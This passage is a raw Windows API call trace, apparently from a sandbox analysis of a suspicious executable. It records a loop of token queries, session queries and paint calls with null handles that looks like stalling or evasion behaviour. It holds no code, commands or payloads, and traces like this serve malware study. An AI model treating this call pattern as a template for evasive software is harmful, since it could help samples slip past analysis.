ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x678) returned 1 [0072.505] GetTokenInformation (in: TokenHandle=0x678, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.505] GetLastError () returned 0x7a [0072.505] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.505] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.505] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.505] TextOutW (hdc=0x0, x=2744, y=6624, lpString="", c=0) returned 1 [0072.505] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.505] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.505] GetTickCount () returned 0x1f373 [0072.506] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.506] SetForegroundWindow (hWnd=0x0) returned 0 [0072.506] BringWindowToTop (hWnd=0x0) returned 0 [0072.506] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x67c) returned 1 [0072.506] GetTokenInformation (in: TokenHandle=0x67c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.506] GetLastError () returned 0x7a [0072.506] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.506] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.507] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.507] TextOutW (hdc=0x0, x=2754, y=6649, lpString="", c=0) returned 1 [0072.507] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.507] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.507] GetTickCount () returned 0x1f373 [0072.508] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.508] SetForegroundWindow (hWnd=0x0) returned 0 [0072.508] BringWindowToTop (hWnd=0x0) returned 0 [0072.508] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x680) returned 1 [0072.508] GetTokenInformation (in: TokenHandle=0x680, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.508] GetLastError () returned 0x7a [0072.508] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.508] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.509] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.509] TextOutW (hdc=0x0, x=2764, y=6674, lpString="", c=0) returned 1 [0072.509] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.509] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.509] GetTickCount () returned 0x1f373 [0072.509] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.509] SetForegroundWindow (hWnd=0x0) returned 0 [0072.509] BringWindowToTop (hWnd=0x0) returned 0 [0072.509] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x684) returned 1 [0072.510] GetTokenInformation (in: TokenHandle=0x684, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.510] GetLastError () returned 0x7a [0072.510] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.510] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.510] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.510] TextOutW (hdc=0x0, x=2774, y=6699, lpString="", c=0) returned 1 [0072.510] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.510] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.510] GetTickCount () returned 0x1f373 [0072.511] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.511] SetForegroundWindow (hWnd=0x0) returned 0 [0072.511] BringWindowToTop (hWnd=0x0) returned 0 [0072.511] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x688) returned 1 [0072.511] GetTokenInformation (in: TokenHandle=0x688, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.511] GetLastError () returned 0x7a [0072.511] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.511] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.511] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.511] TextOutW (hdc=0x0, x=2784, y=6724, lpString="", c=0) returned 1 [0072.511] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.512] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.512] GetTickCount () returned 0x1f373 [0072.512] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.512] SetForegroundWindow (hWnd=0x0) returned 0 [0072.512] BringWindowToTop (hWnd=0x0) returned 0 [0072.512] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x68c) returned 1 [0072.512] GetTokenInformation (in: TokenHandle=0x68c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.512] GetLastError () returned 0x7a [0072.512] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.512] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.513] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.513] TextOutW (hdc=0x0, x=2794, y=6749, lpString="", c=0) returned 1 [0072.513] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.513] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.513] GetTickCount () returned 0x1f373 [0072.513] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.513] SetForegroundWindow (hWnd=0x0) returned 0 [0072.513] BringWindowToTop (hWnd=0x0) returned 0 [0072.514] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x690) returned 1 [0072.514] GetTokenInformation (in: TokenHandle=0x690, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.514] GetLastError () returned 0x7a [0072.514] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.514] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.514] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.514] TextOutW (hdc=0x0, x=2804, y=6774, lpString="", c=0) returned 1 [0072.514] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.514] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.514] GetTickCount () returned 0x1f373 [0072.515] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.515] SetForegroundWindow (hWnd=0x0) returned 0 [0072.515] BringWindowToTop (hWnd=0x0) returned 0 [0072.515] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x694) returned 1 [0072.515] GetTokenInformation (in: TokenHandle=0x694, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.515] GetLastError () returned 0x7a [0072.515] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.515] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.516] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.516] TextOutW (hdc=0x0, x=2814, y=6799, lpString="", c=0) returned 1 [0072.516] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.516] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.516] GetTickCount () returned 0x1f373 [0072.517] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.517] SetForegroundWindow (hWnd=0x0) returned 0 [0072.517] BringWindowToTop (hWnd=0x0) returned 0 [0072.517] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x698) returned 1 [0072.517] GetTokenInformation (in: TokenHandle=0x698, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.517] GetLastError () returned 0x7a [0072.517] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.517] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.517] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.518] TextOutW (hdc=0x0, x=2824, y=6824, lpString="", c=0) returned 1 [0072.518] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.518] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.518] GetTickCount () returned 0x1f373 [0072.518] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.518] SetForegroundWindow (hWnd=0x0) returned 0 [0072.518] BringWindowToTop (hWnd=0x0) returned 0 [0072.518] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x69c) returned 1 [0072.518] GetTokenInformation (in: TokenHandle=0x69c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.518] GetLastError () returned 0x7a [0072.518] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.518] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.519] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.519] TextOutW (hdc=0x0, x=2834, y=6849, lpString="", c=0) returned 1 [0072.519] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.519] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.519] GetTickCount () returned 0x1f383 [0072.520] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.520] SetForegroundWindow (hWnd=0x0) returned 0 [0072.520] BringWindowToTop (hWnd=0x0) returned 0 [0072.520] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6a0) returned 1 [0072.520] GetTokenInformation (in: TokenHandle=0x6a0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.520] GetLastError () returned 0x7a [0072.520] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.520] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.521] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.521] TextOutW (hdc=0x0, x=2844, y=6874, lpString="", c=0) returned 1 [0072.521] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.521] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.521] GetTickCount () returned 0x1f383 [0072.521] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.521] SetForegroundWindow (hWnd=0x0) returned 0 [0072.522] BringWindowToTop (hWnd=0x0) returned 0 [0072.522] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6a4) returned 1 [0072.522] GetTokenInformation (in: TokenHandle=0x6a4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.522] GetLastError () returned 0x7a [0072.522] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.522] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.522] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.522] TextOutW (hdc=0x0, x=2854, y=6899, lpString="", c=0) returned 1 [0072.522] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.522] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.522] GetTickCount () returned 0x1f383 [0072.524] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.524] SetForegroundWindow (hWnd=0x0) returned 0 [0072.524] BringWindowToTop (hWnd=0x0) returned 0 [0072.524] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6a8) returned 1 [0072.524] GetTokenInformation (in: TokenHandle=0x6a8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.524] GetLastError () returned 0x7a [0072.524] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.524] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.525] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.525] TextOutW (hdc=0x0, x=2864, y=6924, lpString="", c=0) returned 1 [0072.525] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.525] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.525] GetTickCount () returned 0x1f383 [0072.526] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.526] SetForegroundWindow (hWnd=0x0) returned 0 [0072.526] BringWindowToTop (hWnd=0x0) returned 0 [0072.526] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6ac) returned 1 [0072.526] GetTokenInformation (in: TokenHandle=0x6ac, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.526] GetLastError () returned 0x7a [0072.526] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.526] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.527] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.527] TextOutW (hdc=0x0, x=2874, y=6949, lpString="", c=0) returned 1 [0072.527] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.527] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.527] GetTickCount () returned 0x1f383 [0072.527] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.527] SetForegroundWindow (hWnd=0x0) returned 0 [0072.527] BringWindowToTop (hWnd=0x0) returned 0 [0072.528] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6b0) returned 1 [0072.528] GetTokenInformation (in: TokenHandle=0x6b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.528] GetLastError () returned 0x7a [0072.528] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.528] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.528] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.528] TextOutW (hdc=0x0, x=2884, y=6974, lpString="", c=0) returned 1 [0072.528] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.528] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.528] GetTickCount () returned 0x1f383 [0072.529] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.529] SetForegroundWindow (hWnd=0x0) returned 0 [0072.529] BringWindowToTop (hWnd=0x0) returned 0 [0072.529] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6b4) returned 1 [0072.529] GetTokenInformation (in: TokenHandle=0x6b4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.529] GetLastError () returned 0x7a [0072.529] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.529] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.529] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.530] TextOutW (hdc=0x0, x=2894, y=6999, lpString="", c=0) returned 1 [0072.530] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.530] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.530] GetTickCount () returned 0x1f383 [0072.530] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.530] SetForegroundWindow (hWnd=0x0) returned 0 [0072.530] BringWindowToTop (hWnd=0x0) returned 0 [0072.530] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6b8) returned 1 [0072.530] GetTokenInformation (in: TokenHandle=0x6b8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.530] GetLastError () returned 0x7a [0072.530] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.530] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.531] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.531] TextOutW (hdc=0x0, x=2904, y=7024, lpString="", c=0) returned 1 [0072.531] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.531] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.531] GetTickCount () returned 0x1f383 [0072.532] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.532] SetForegroundWindow (hWnd=0x0) returned 0 [0072.532] BringWindowToTop (hWnd=0x0) returned 0 [0072.532] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6bc) returned 1 [0072.532] GetTokenInformation (in: TokenHandle=0x6bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.532] GetLastError () returned 0x7a [0072.532] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.532] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.532] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.532] TextOutW (hdc=0x0, x=2914, y=7049, lpString="", c=0) returned 1 [0072.532] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.532] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.532] GetTickCount () returned 0x1f383 [0072.533] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.533] SetForegroundWindow (hWnd=0x0) returned 0 [0072.533] BringWindowToTop (hWnd=0x0) returned 0 [0072.533] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6c0) returned 1 [0072.533] GetTokenInformation (in: TokenHandle=0x6c0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.533] GetLastError () returned 0x7a [0072.533] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.533] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.534] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.534] TextOutW (hdc=0x0, x=2924, y=7074, lpString="", c=0) returned 1 [0072.534] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.534] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.534] GetTickCount () returned 0x1f392 [0072.535] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.535] SetForegroundWindow (hWnd=0x0) returned 0 [0072.535] BringWindowToTop (hWnd=0x0) returned 0 [0072.535] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6c4) returned 1 [0072.536] GetTokenInformation (in: TokenHandle=0x6c4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.536] GetLastError () returned 0x7a [0072.536] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.536] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.536] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.538] TextOutW (hdc=0x0, x=2934, y=7099, lpString="", c=0) returned 1 [0072.538] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.538] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.538] GetTickCount () returned 0x1f392 [0072.539] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.539] SetForegroundWindow (hWnd=0x0) returned 0 [0072.539] BringWindowToTop (hWnd=0x0) returned 0 [0072.539] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x6c8) returned 1 [0072.539] GetTokenInformation (in: TokenHandle=0x6c8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.539] GetLastError () returned 0x7a [0072.539] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.539] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | 